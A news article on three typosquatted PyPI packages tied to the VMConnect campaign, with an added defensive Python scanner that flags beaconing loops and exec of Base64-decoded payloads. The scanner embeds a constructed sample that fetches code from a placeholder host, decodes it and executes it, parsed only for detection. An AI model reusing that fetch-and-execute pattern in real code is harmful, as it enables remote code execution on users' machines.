Three new malicious Python packages have been discovered in the popular PyPI repository. According to experts, they are part of the VMConnect campaign, which was probably organized by North Korean hackers.

The packages, published under the names tablediter, request-plus and requestspro, were identified by the cybersecurity organization ReversingLabs.

The VMConnect campaign uses Python packages that mimic popular open source tools. Once installed, they automatically download additional malware.

The attackers use typosquatting to make the malicious packages look legitimate: the packages are given names very similar to those of popular libraries, which can mislead developers and help the packages avoid detection.

One of the packages, tablediter, does not activate its malicious code immediately after installation, in order to evade security systems.

The code inside tablediter runs in an infinite loop, regularly contacting an external server to download and execute Base64-encoded code. The exact nature of that code is still unknown, which adds a further degree of uncertainty and risk for defenders.

The other two packages, request-plus and requestspro, collect information about the infected computer and send it to the command-and-control (C&C) server.

After establishing a connection to the C&C server, the infected system receives a specialized token. It sends the token back, but to a different address on the same server, and in response receives an encoded Python module and a download link.

The researchers suggest that the module uses this link to download the next stage of the malware.
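The two behaviours described above (tablediter's infinite polling loop, and the execution of encoded code fetched from the server) are the kind of pattern a static check can surface before a package is trusted. The following scanner is an added, defensive example, not code from the article or from ReversingLabs: it uses Python's standard `ast` module to flag a `while True` loop that performs network calls and any `exec`/`eval` whose argument comes from a Base64 decoder. The sample module is constructed to mirror the article's description and is only parsed, never executed; the URL in it is a placeholder, not a real indicator.

```python
import ast

# Constructed sample mirroring the behaviour the article describes:
# poll a server in an endless loop, Base64-decode the reply, run it.
# It is parsed for analysis only and never executed. Placeholder URL.
SUSPICIOUS_SAMPLE = """
import base64, time, urllib.request
def run():
    while True:
        blob = urllib.request.urlopen("http://PLACEHOLDER.invalid/x").read()
        exec(base64.b64decode(blob))
        time.sleep(300)
"""

# Constructed benign module: uses base64 legitimately, no exec, no loop.
BENIGN_SAMPLE = """
import base64
def encode(data):
    return base64.b64encode(data).decode()
"""

NETWORK_CALLS = {"urlopen", "get", "post", "request", "create_connection"}
DECODERS = {"b64decode", "decodebytes", "a85decode", "b85decode"}
EXECUTORS = {"exec", "eval"}


def _call_name(node):
    """Return the callee's final name segment ('urlopen' for urllib.request.urlopen)."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def scan_source(src):
    """Return the set of finding labels for one module's source text."""
    findings = set()
    for node in ast.walk(ast.parse(src)):
        # while True: ... containing a network call -> beaconing loop
        if (isinstance(node, ast.While) and isinstance(node.test, ast.Constant)
                and node.test.value is True):
            names = {_call_name(c) for c in ast.walk(node) if isinstance(c, ast.Call)}
            if names & NETWORK_CALLS:
                findings.add("infinite-loop-with-network")
        # exec()/eval() whose argument is produced by a decoder call
        if isinstance(node, ast.Call) and _call_name(node) in EXECUTORS:
            arg_calls = {_call_name(c) for a in node.args
                         for c in ast.walk(a) if isinstance(c, ast.Call)}
            if arg_calls & DECODERS:
                findings.add("exec-of-decoded-payload")
    return findings
```

Running `scan_source` over every `.py` file in an unpacked wheel or sdist before installation turns these two heuristics into a cheap pre-install gate; the output is a prompt for manual review, not proof of malice.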

The current attack scenarios closely resemble other known incidents, such as the JumpCloud attacks and the npm campaigns, which reinforces the theory that North Korean hackers are involved. Interestingly, in other operations the attackers pursued financial gain and mainly targeted cryptocurrency platforms.

Similar attacks have been found targeting macOS and Linux. This is just the latest example in a series of attacks against users of the PyPI repository, underscoring that security teams need to stay on their guard.
